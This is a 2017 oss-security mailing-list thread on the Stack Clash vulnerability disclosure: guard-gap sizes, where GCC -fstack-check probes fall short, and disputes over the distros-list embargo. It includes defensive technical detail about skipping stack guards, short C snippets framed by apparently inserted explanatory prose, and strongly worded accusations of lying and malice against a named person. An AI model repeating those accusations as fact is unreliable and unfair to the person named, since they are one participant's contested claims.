On 06/22/2017 08:00 AM, Daniel Micay wrote:
> Is it planned to have glibc use a larger 1M gap for secondary stacks
> rather than a single guard page? That would be a *lot* easier than it
> was to set it up for the main thread stack. It follows the main thread
> stack rlimit as a guideline so it seems to make sense to use the same
> guard region size too. If it ends up exposed as a sysctl, it could read
> the current value from there.

On the glibc side, we are waiting for the kernel interface for the
configurable gap size to materialize upstream.

Thanks,
Florian
Agostino Sarubbo
2017-06-21 10:46:28 UTC
On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
> III. Solutions
> - Recompile all userland code (ld.so, libraries, binaries) with GCC's
> "-fstack-check" option, which prevents the stack-pointer from moving
> into another memory region without accessing the stack guard-page (it
> writes one word to every 4KB page allocated on the stack).

For the record, Gentoo Hardened enables by default -fstack-check=specific

--
Agostino Sarubbo
Gentoo Linux Developer
Brad Spengler
2017-06-21 12:25:26 UTC
On Wed, Jun 21, 2017 at 12:46:28PM +0200, Agostino Sarubbo wrote:
> On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
> > III. Solutions
> > - Recompile all userland code (ld.so, libraries, binaries) with GCC's
> > "-fstack-check" option, which prevents the stack-pointer from moving
> > into another memory region without accessing the stack guard-page (it
> > writes one word to every 4KB page allocated on the stack).
>
> For the record, Gentoo Hardened enables by default -fstack-check=specific

I'd also like to mention for the record, that despite tweets like:
https://twitter.com/kurtseifried/status/876818809079816193
"CVE-2017-1000377 Oh you thought running GRsecurity PAX was going to save
you?"
https://twitter.com/GentooHardened/status/877309872714522624
(the latter apparently having been removed, while the former is
still going strong solely due to the stubbornness of its author)

grsecurity was the only project without a valid CVE assigned to it.

Kurt Seifried of Red Hat chose to make use of the 4 weeks he had in
private to assign a bogus CVE against grsecurity (let's ignore that Kurt
thinks "GRsecurity" is a vendor and "PAX" is a product), then shot off
with a claim completely opposite from that present in the advisory.
Despite being called out on it by numerous people in public, and despite
my offering in private to allow him to correct his own almost
gleefully-published lies, he's instead chosen to waste two full days of
our time and that of several others, including Qualys, who for the public
record did not request the CVE against grsecurity. Kurt Seifried of Red
Hat chose to do it himself, and even provided private emails
demonstrating as such.

In my view, this taints the CVE process when someone apparently so
biased fails to take responsibility for their own actions, and uses their
position as judge, jury, and executioner of the DWF/CVE process to dole
out damaging claims that are in direct opposition to what was stated in
the advisory in the first place, for anyone who had read it at all.

Either Kurt Seifried of Red Hat didn't read the advisory at all in those
4 weeks, or he was too incompetent to understand the clear statements
being made in it, and too stubborn to admit his mistake, choosing to
leave his tweet up even now, apparently waiting for the news cycle to
end on this issue.

I was not contacted about this CVE ahead of time where it would have
been trivial to correct any incompetence on the part of Kurt prior to
the CVE being incorrectly issued -- my first notification was his
childish tweet, not something I would expect from a supposed professional
during work hours at his Red Hat employment.

Kurt gave excuse after excuse, finally hiding behind the CVE process
itself, insisting Qualys would need to provide some reason for rejection
of the CVE (which they did, despite it not being necessary for them to do
so as they never requested the CVE in the first place). This was purely
the fault of Kurt Seifried, and he alone chose to intentionally delay the
entire process of correcting the matter, and also gave no justification
as to why his completely false tweet still remained despite there being
no formal process required there once it was abundantly clear he was in
the wrong. I would be happy to assume Kurt was simply incompetent and
either didn't read the advisory or didn't understand the simple facts
contained in it (like that the PoC would take over 1500 years to work
against grsecurity under even an intentionally weakened configuration),
but his stubborn refusal to remove or correct a tweet he is clearly aware
now is wrong suggests to me nothing other than maliciousness.

If I am wrong about something, I am happy to own up to it ASAP -- why
is it so difficult for certain other people to act decently?

It doesn't bode well for the embargoing process if this is how things
are going to work for projects that don't participate. Is the purpose
to prepare Red Hat's marketing materials in advance? To hide the fact
that this issue should have been obvious to them many years ago but
due to their lack of investment in security despite being a
multi-billion dollar company they failed to protect their customers
against it? Was the purpose for upstream developers to spend 4 weeks
NIH'ing our existing fix for this issue from 2010, repeating the same
events from 2010 as they've yet again produced a broken patch that oopses
machines and failed under trivial fuzzing?

Because if any lesson can be taken away from this whole mess, it's
certainly not whatever these others that didn't protect their users
for all these years have to say about it. It's a clear vindication of
our security strategy and a demonstration of what happens when actual
investment and effective original ideas informed by offense are put
into security.

Finally, one thing I noted was missing from Solar's timeline is that
on May 18th, the day after the private distros list was notified with
details, this commit appeared in public:
https://github.com/openbsd/src/commit/4ed6bfeac112229466414b94cdbd983fb8017796

OpenBSD publishing this commit, in combination with Solar making repeated
mentions here on oss-sec about a cross-OS issue being worked on was enough
for me to know that the underlying issue being discussed was what we had
widely discussed publicly in 2010 on LWN and elsewhere. What's the official
explanation for this, and is any action being taken for what I assume is a
member of the private list breaking the embargo?

Appendix:
Famous last words from the PaX Team in reply to Linus' broken heap stack gap
code from 2010:
https://lkml.org/lkml/2011/6/6/306
"what a pity that now you get to revert the whole shit
and implement it properly (i don't need to tell you where you can find such
a working solution, do i)."
(the whole post is quite good as an example of the dangers of NIH)

-Brad
Solar Designer
2017-06-21 13:57:27 UTC
On Wed, Jun 21, 2017 at 08:25:26AM -0400, Brad Spengler wrote:
> Finally, one thing I noted was missing from Solar's timeline is that
> on May 18th, the day after the private distros list was notified with
> details, this commit appeared in public:
> https://github.com/openbsd/src/commit/4ed6bfeac112229466414b94cdbd983fb8017796

IIRC, they also committed a relevant fix to their qsort().

> OpenBSD publishing this commit, in combination with Solar making repeated
> mentions here on oss-sec about a cross-OS issue being worked on was enough
> for me to know that the underlying issue being discussed was what we had
> widely discussed publicly in 2010 on LWN and elsewhere. What's the official
> explanation for this, and is any action being taken for what I assume is a
> member of the private list breaking the embargo?

OpenBSD isn't a member of the distros list - they were notified by
Qualys separately. This matter was discussed, and some folks were
unhappy about OpenBSD's action, but in the end it was decided that
since, as you correctly say, the underlying issue was already publicly
known, OpenBSD's commits don't change things much. Sure this draws
renewed attention to the problem, but probably not to the extent and in
the many specific ways the Qualys findings cover. So it was decided to
keep the embargo on the detail.

Ditto for the "move mmap_area and PIE binaries away from the stack"
patch series posted to LKML and CC'ed to kernel-hardening on June 2:

http://www.openwall.com/lists/kernel-hardening/2017/06/02/

which might have been inspired by Qualys work known to Red Hat engineers
internally. A difference is that Red Hat is a member of the distros
list. I brought this up on the distros list, and another Red Hat person
said "We'll deal with this internally." Given the circumstances, I find
this response satisfactory.

I am far more concerned about the total embargo duration here than about
these two semi-leaks.

Alexander
Daniel Micay
2017-06-21 16:44:32 UTC
> Ditto for the "move mmap_area and PIE binaries away from the stack"
> patch series posted to LKML and CC'ed to kernel-hardening on June 2:
>
> http://www.openwall.com/lists/kernel-hardening/2017/06/02/

That's tied to this, and talking to Riel about it on IRC, since he's
interested in upstreaming these kinds of changes:

https://gist.github.com/thestinger/b43b460cfccfade51b5a2220a0550c35

He submitted an initial set of the changes moving towards being able to
tie the stack mapping entropy to the mmap_rnd_bits sysctl upstream, and
likely increasing the default value to match the current stack entropy
on 32-bit. It wasn't motivated by stack exhaustion bugs. The stack
rlimit calculation bug and the ASLR range overlap issue have been
publicly discussed independently of this context.

RAND_THREADSTACK wasn't in the scope of that effort because CopperheadOS
does ASLR for secondary stacks in userspace where it can randomize lower
bits along with splitting a region for libraries (incl. dlopen) from the
rest of the mmap usage.

I didn't get early disclosure access or a leak of this round of issues.
I wouldn't have done anything in response to it. I already went through
the userspace Android Open Source Project alloca / VLA uses last year
due to the unavailability of -fstack-check in Clang and only found
CVE-2016-3922 (unbounded VLA at a local privilege boundary), a few bugs that
I considered security bugs but that Google did not and a bunch of bugs
that I ruled out as possible security issues. Some of those are now gone
due to rewrites from C and C style C++ to higher level C++ or Java.
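A common way to remove an unbounded VLA/alloca of the kind described above is to cap on-stack scratch space and fall back to the heap for larger inputs. The C sketch below illustrates that pattern. The 4096-byte cap and the function name `checksum_copy` are hypothetical and are not taken from AOSP or any of the fixes mentioned.

```c
#include <stdlib.h>
#include <string.h>

/* Assumed cap on on-stack scratch space; larger inputs go to the heap. */
#define STACK_SCRATCH_MAX 4096u

/* Hypothetical example: copy `len` bytes into scratch space and sum them.
   An unbounded `unsigned char buf[len];` here would let a caller-controlled
   `len` move the stack pointer arbitrarily far, possibly past the guard. */
long checksum_copy(const unsigned char *src, size_t len)
{
    unsigned char small[STACK_SCRATCH_MAX];   /* fixed, bounded stack use */
    unsigned char *buf = small;
    long sum = 0;

    if (len > sizeof small) {
        buf = malloc(len);                    /* large inputs never touch the stack */
        if (buf == NULL)
            return -1;
    }
    memcpy(buf, src, len);
    for (size_t i = 0; i < len; i++)
        sum += buf[i];
    if (buf != small)
        free(buf);
    return sum;
}
```

The stack frame size is now a compile-time constant regardless of `len`. This avoids depending on `-fstack-check` coverage for this function.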

It looks like https://reviews.llvm.org/D34386 is finally going to land
for Rust and then it's straightforward to have Clang stop implementing
-fstack-check as a no-op for architectures where that gets ported. It'll
be nice not needing to carry an out-of-tree patch derived from a failed
past attempt to land it.
Brad Spengler
2017-06-21 21:27:43 UTC
> OpenBSD isn't a member of the distros list - they were notified by
> Qualys separately. This matter was discussed, and some folks were
> unhappy about OpenBSD's action, but in the end it was decided that
> since, as you correctly say, the underlying issue was already publicly
> known, OpenBSD's commits don't change things much. Sure this draws
> renewed attention to the problem, but probably not to the extent and in
> the many specific ways the Qualys findings cover. So it was decided to
> keep the embargo on the detail.

Thank you for clarifying that, my assumption was indeed wrong then.

Still, if OpenBSD was able to resolve the issues necessary after
notification without leaking full details to the public, shouldn't
this have been possible for the other projects without an embargo,
let alone an extended one? Especially considering that the full
duration of the extended embargo didn't result in complete fixes for
the issue and in fact resulted in a broken fix for Linux, which
could easily have been avoided if the discussions around it happened
in public (and none of the deep details from the Qualys advisory
would have been needed for any of those discussions).
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f4cb767d76cf7ee72f97dd76f6cfa6c76a5edc89
for instance mentions Linus' fix blew up in 3 minutes of fuzz testing.

> Ditto for the "move mmap_area and PIE binaries away from the stack"
> patch series posted to LKML and CC'ed to kernel-hardening on June 2:
>
> http://www.openwall.com/lists/kernel-hardening/2017/06/02/
>
> which might have been inspired by Qualys work known to Red Hat engineers
> internally. A difference is that Red Hat is a member of the distros
> list. I brought this up on the distros list, and another Red Hat person
> said "We'll deal with this internally." Given the circumstances, I find
> this response satisfactory.

At first I was rather concerned about this, so I emailed Rik
directly and asked him the simple question of whether the advance
notice prioritized or kickstarted the process of porting those
features, regardless of having looked at some code in the past (as I
imagine much of our code has been looked at). I too am satisfied
with his answer that the actual porting work on his part had already
been done prior to that notice, and that any internal concerns afterward
were simply to avoid the appearance of impropriety.

My take on the embargoing process (outside of what's already mentioned
on https://grsecurity.net/an_ancient_kernel_hole_is_not_closed.php ):
I've always been concerned by the fact that smaller distros seem to
be barred from distros-list membership; it seems the arrangement
lends itself too much to enabling the marketing of the larger
companies and in fact perhaps even disincentivizing their investment
in security as the embargo process enables them to skirt much of the
public pain they'd otherwise have to experience (for in this
instance what was a completely avoidable problem). I get the practical
reasons for the policy (increased leak risk, major distros often do
the actual fixing work, etc) but from a level of principle it's always
rubbed me the wrong way.

So despite that I have full trust in you Alexander as being
completely transparent and impartial despite having to engage in a
bit of politics necessary to work with all the companies involved, I
am uneasy (and I believe I note some uneasiness in your own mails)
with how others are exploiting the arrangement despite your sincere
efforts at sticking to the policies you established.

That said, I think regardless of whether you head the distros list
or not, the major companies are going to see it to be in their
financial/PR interest to maintain an embargo list. I would not be
surprised at all if, were you to step down from the role/shutter the
list, a company like Red Hat would quickly swoop in to "take the
reins." Which would be a shame and adds to my general worries about
the direction this industry is going in, since your record for fairness
is sterling, and I doubt very much that dogged dedication to
transparency, fairness, and ethics would continue with anyone else
at the helm.

Thanks,
-Brad
Mike O'Connor
2017-06-22 00:26:05 UTC
:Still, if OpenBSD was able to resolve the issues necessary after
:notification without leaking full details to the public, shouldn't
:this have been possible for the other projects without an embargo,

Several open-source distros fixing the same flavor of issue in the
same timeframe might've raised suspicions in a way that one distro
alone wouldn't have. Heck, I've tracked down embargoed security
issues just from what multiple closed source vendors documented in
their release notes.

:My take on the embargoing process (outside of what's already mentioned
:on https://grsecurity.net/an_ancient_kernel_hole_is_not_closed.php ):
:I've always been concerned by the fact that smaller distros seem to
:be barred from distros-list membership; it seems the arrangement
:lends itself too much to enabling the marketing of the larger
:companies and in fact perhaps even disincentivizing their investment
:in security as the embargo process enables them to skirt much of the
:public pain they'd otherwise have to experience (for in this
:instance what was a completely avoidable problem). I get the practical
:reasons for the policy (increased leak risk, major distros often do
:the actual fixing work, etc) but from a level of principle it's always
:rubbed me the wrong way.

In the past, I've proposed that the embargo mailing list archives
themselves have an "embargo", after which they become public. That
way, there's after-the-fact transparency, and it gives the folks who
care a good idea of what happened. Is there anything sensitive at
this point in, say, the March 2017 linux-distros archives??

-Mike

--
Michael J. O'Connor ***@dojo.mi.org
=--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--=
"Well done is better than well said." -Ben Franklin
Solar Designer
2017-06-24 14:57:14 UTC
On Wed, Jun 21, 2017 at 08:26:05PM -0400, Mike O'Connor wrote:
> In the past, I've proposed that the embargo mailing list archives
> themselves have an "embargo", after which they become public. That
> way, there's after-the-fact transparency, and it gives the folks who
> care a good idea of what happened. Is there anything sensitive at
> this point in, say, the March 2017 linux-distros archives??

There shouldn't be anything sensitive in old archives, such as in your
example. Technically, we can easily extract and make public the message
Subjects. For full messages, we need a way to mass-decrypt an mbox
containing PGP/MIME messages. Maybe I should list implementing a
program that would do that(*) as one of the options that a new distros
list member could choose as their contribution back to the community.

(*) Mutt hack maybe? Mutt processes those messages great, so having it
output them in decrypted form into another mbox and automatically loop
over all messages in the input mbox might do the trick.
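The C sketch below covers only the looping half of that idea. It walks an in-memory mbox and hands each message to a callback, where a real tool would perform the PGP/MIME decryption. The names `message_fn` and `for_each_mbox_message` are hypothetical. Decryption is deliberately left out, and this is not how Mutt itself is implemented.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical per-message hook: a real tool would decrypt `msg` here. */
typedef void (*message_fn)(const char *msg, size_t len, void *ctx);

/* Walk a NUL-terminated mbox and call `fn` (if non-NULL) once per message.
   In the mbox format each message starts with a line beginning "From ";
   body lines that start that way are conventionally escaped as ">From ". */
size_t for_each_mbox_message(const char *mbox, message_fn fn, void *ctx)
{
    size_t count = 0;
    const char *start = NULL;     /* beginning of the current message */
    const char *p;

    for (p = mbox; *p != '\0'; p++) {
        int at_line_start = (p == mbox || p[-1] == '\n');
        if (at_line_start && strncmp(p, "From ", 5) == 0) {
            if (start != NULL && fn != NULL)
                fn(start, (size_t)(p - start), ctx);   /* flush previous message */
            start = p;
            count++;
        }
    }
    if (start != NULL && fn != NULL)
        fn(start, (size_t)(p - start), ctx);           /* flush the last message */
    return count;
}
```

The function returns the number of messages it found, so passing `NULL` as the callback simply counts them.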

Alexander
Jeff Law
2017-06-23 13:56:30 UTC
On 06/21/2017 03:27 PM, Brad Spengler wrote:
>> OpenBSD isn't a member of the distros list - they were notified by
>> Qualys separately. This matter was discussed, and some folks were
>> unhappy about OpenBSD's action, but in the end it was decided that
>> since, as you correctly say, the underlying issue was already publicly
>> known, OpenBSD's commits don't change things much. Sure this draws
>> renewed attention to the problem, but probably not to the extent and in
>> the many specific ways the Qualys findings cover. So it was decided to
>> keep the embargo on the detail.
>
> Thank you for clarifying that, my assumption was indeed wrong then.
>
> Still, if OpenBSD was able to resolve the issues necessary after
> notification without leaking full details to the public, shouldn't
> this have been possible for the other projects without an embargo,
> let alone an extended one?
I really doubt it for GCC for a variety of reasons. Hell, I doubt I
could have gotten even a good discussion going about the problems with
-fstack-check without the details of the embargo'd CVE.

Even if I was able to get interest from other key GCC contributors, the
level of detail I'd have to disclose to those key contributors to make
progress would likely have violated the embargo.

Perhaps part of the difference is OpenBSD can move fairly independently
while something like GCC requires larger scale coordination and public
discussion.

Jeff
Kurt Seifried
2017-06-23 14:02:36 UTC
On 2017-06-23 7:56 AM, Jeff Law wrote:
> On 06/21/2017 03:27 PM, Brad Spengler wrote:
>>> OpenBSD isn't a member of the distros list - they were notified by
>>> Qualys separately. This matter was discussed, and some folks were
>>> unhappy about OpenBSD's action, but in the end it was decided that
>>> since, as you correctly say, the underlying issue was already publicly
>>> known, OpenBSD's commits don't change things much. Sure this draws
>>> renewed attention to the problem, but probably not to the extent and in
>>> the many specific ways the Qualys findings cover. So it was decided to
>>> keep the embargo on the detail.
>> Thank you for clarifying that, my assumption was indeed wrong then.
>>
>> Still, if OpenBSD was able to resolve the issues necessary after
>> notification without leaking full details to the public, shouldn't
>> this have been possible for the other projects without an embargo,
>> let alone an extended one?
> I really doubt it for GCC for a variety of reasons. Hell, I doubt I
> could have gotten even a good discussion going about the problems with
> -fstack-check without the details of the embargo'd CVE.
>
> Even if I was able to get interest from other key GCC contributors, the
> level of detail I'd have to disclose to those key contributors to make
> progress would likely have violated the embargo.
>
> Perhaps part of the difference is OpenBSD can move fairly independently
> while something like GCC requires larger scale coordination and public
> discussion.
>
> Jeff
>
OpenBSD made changes to the then known qsort() issue, and implemented
what was then thought to be the solution to the stack guard issue, the 1
megabyte guard pages. Subsequent discussion (without OpenBSD present,
due to them breaking the embargo) took place and as you know we ended up
with some pretty significant changes to glibc (I don't know if OpenBSD
has picked this group of fixes up or not).

--
Kurt Seifried -- Red Hat -- Product Security -- Cloud
PGP A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Red Hat Product Security contact: ***@redhat.com
Solar Designer
2017-06-24 14:14:42 UTC
On Fri, Jun 23, 2017 at 08:02:36AM -0600, Kurt Seifried wrote:
> OpenBSD made changes to the then known qsort() issue, and implemented
> what was then thought to be the solution to the stack guard issue, the 1
> megabyte guard pages. Subsequent discussion (without OpenBSD present,
> due to them breaking the embargo) took place and as you know we ended up
> with some pretty significant changes to glibc (I don't know if OpenBSD
> has picked this group of fixes up or not).

I think Kurt's words "without OpenBSD present, due to them breaking the
embargo" are Kurt's (and maybe others') impression only (and maybe these
people's personal decision(s) not to inform OpenBSD going forward, as
Kurt mentioned he did help ping OpenBSD this time when Qualys wasn't
getting a response from them in early May). No decision on the distros
list at large was made to either inform or not inform OpenBSD of further
issues. As it happened, we did CC the discussion around Cron to Todd
(although like I said in my posting about Cron in here, there was no
point in having that minor issue embargoed in the first place). The
glibc issues and fixes are most likely irrelevant to *BSD libc's - in
fact, we should have been more careful not to spam the full distros list
with them (I think some sub-threads correctly went to linux-distros
only, but some did not).

Alexander
Qualys Security Advisory
2017-06-21 22:15:11 UTC
Hi Brad, Theo, all,

On Wed, Jun 21, 2017 at 08:25:26AM -0400, Brad Spengler wrote:
> OpenBSD publishing this commit
> ...
> What's the official
> explanation for this, and is any action being taken for what I assume is a
> member of the private list breaking the embargo?

OpenBSD is not a member of distros@, and we therefore contacted them
separately: we tried a first time on May 3, then a few times after that,
and on May 12 we received a reply. On that same day, and before we sent
them our advisory draft (OpenBSD part only), we asked them if they would
accept an embargo until May 30, and they accepted.

On May 13 they acknowledged receipt of our advisory draft, on May 17 we
sent them our proof-of-concept, and on May 18 we were notified by a
distros@ member that OpenBSD publicly patched their qsort(), and on May
19 we were notified by another distros@ member that OpenBSD publicly
patched their stack guard-page implementation.

On May 19 we asked OpenBSD for an explanation as to why they broke the
embargo, and on May 21 we received a mail from them but no explanation.

However, instead of dwelling on the past, we would like to ask an
important question about the future: what should we do the next time we
(or other researchers) discover a vulnerability that affects OpenBSD and
other operating systems? Will OpenBSD properly enforce the next
embargo? Please advise. Thank you very much!

With best regards,

--
the Qualys Security Advisory team
Jeff Law
2017-06-21 16:22:20 UTC
On 06/21/2017 04:46 AM, Agostino Sarubbo wrote:
> On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
>> III. Solutions
>> - Recompile all userland code (ld.so, libraries, binaries) with GCC's
>> "-fstack-check" option, which prevents the stack-pointer from moving
>> into another memory region without accessing the stack guard-page (it
>> writes one word to every 4KB page allocated on the stack).
>
> For the record, Gentoo Hardened enables by default -fstack-check=specific
And if you were to look at the generated code, you'll see that it
happily skips 2-3 pages of probes in prologues as well as within alloca
spaces. It's a false sense of security.

jeff
PaX Team
2017-06-21 21:29:56 UTC
On 21 Jun 2017 at 10:22, Jeff Law wrote:

> On 06/21/2017 04:46 AM, Agostino Sarubbo wrote:
> > On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
> >> III. Solutions
> >> - Recompile all userland code (ld.so, libraries, binaries) with GCC's
> >> "-fstack-check" option, which prevents the stack-pointer from moving
> >> into another memory region without accessing the stack guard-page (it
> >> writes one word to every 4KB page allocated on the stack).
> >
> > For the record, Gentoo Hardened enables by default -fstack-check=specific
> And if you were to look at the generated code, you'll see that it
> happily skips 2-3 pages of probes in prologues as well as within alloca
> spaces. It's a false sense of security.

Gentoo Hardened uses the grsecurity kernel which enforces a 64kB heap-stack
gap by default (it's also user adjustable). are you saying that the gcc
probes are not sufficient to prevent jumping over that range?
Jeff Law
2017-06-21 22:48:14 UTC
On 06/21/2017 03:29 PM, PaX Team wrote:
> On 21 Jun 2017 at 10:22, Jeff Law wrote:
>
>> On 06/21/2017 04:46 AM, Agostino Sarubbo wrote:
>>> On Monday 19 June 2017 08:28:43 Qualys Security Advisory wrote:
>>>> III. Solutions
>>>> - Recompile all userland code (ld.so, libraries, binaries) with GCC's
>>>> "-fstack-check" option, which prevents the stack-pointer from moving
>>>> into another memory region without accessing the stack guard-page (it
>>>> writes one word to every 4KB page allocated on the stack).
>>>
>>> For the record, Gentoo Hardened enables by default -fstack-check=specific
>> And if you were to look at the generated code, you'll see that it
>> happily skips 2-3 pages of probes in prologues as well as within alloca
>> spaces. It's a false sense of security.
>
> Gentoo Hardened uses the grsecurity kernel which enforces a 64kB heap-stack
> gap by default (it's also user adjustable). are you saying that the gcc
> probes are not sufficient to prevent jumping over that range?
With a 64k guard, you should be OK and protected. -fstack-check will
consistently skip 8218 bytes on x86 (8192 on most architectures). Even
if you combined the skipped space from the prologue and the skipped
space in the dynamic area, you're only at just over 16k -- and it's not
clear the two skipped areas could be combined like that anyway.
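The arithmetic above can be written as a tiny C check. The 8218-byte figure is the x86 number quoted in this message. The rule "total unprobed bytes must stay below the guard gap" is a conservative simplification assumed here. It pessimistically adds the prologue and dynamic-area skips even though, as noted, it is unclear they can actually be combined. The function name `gap_covers_skips` is hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>

/* x86 figure from the message: bytes -fstack-check can leave unprobed. */
#define X86_UNPROBED_SKIP 8218u

/* Conservative check: even if the prologue skip and the dynamic-area skip
   could be combined, the total must stay smaller than the guard gap. */
bool gap_covers_skips(size_t guard_gap, size_t prologue_skip, size_t dynamic_skip)
{
    return prologue_skip + dynamic_skip < guard_gap;
}
```

With a 64 kB gap, 8218 + 8218 = 16436 bytes is just over 16 KiB and well under 65536. With a single 4 KiB guard page, even one skipped region is enough to jump past it, which is why a one-page guard with `-fstack-check` was described earlier in the thread as a false sense of security.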


Given the larger guard you should be in good shape. Sorry to have
sounded alarmist without having full information about your
configuration, particularly WRT the expanded guard page.


--

There's one theoretical approach I'm aware of that one could use to
skip the guard in your situation. I'm not aware of any code in practice
that would have the right properties to trigger it, *and* triggering it would
require a particular optimization that neither LLVM nor GCC performs, to
the best of my knowledge (nor are they likely to, as the optimization would
not likely improve any hot path performance).

We'll be making that theoretical attack significantly harder to exploit
as part of the upstream GCC work around a new -fstack-check implementation.


Jeff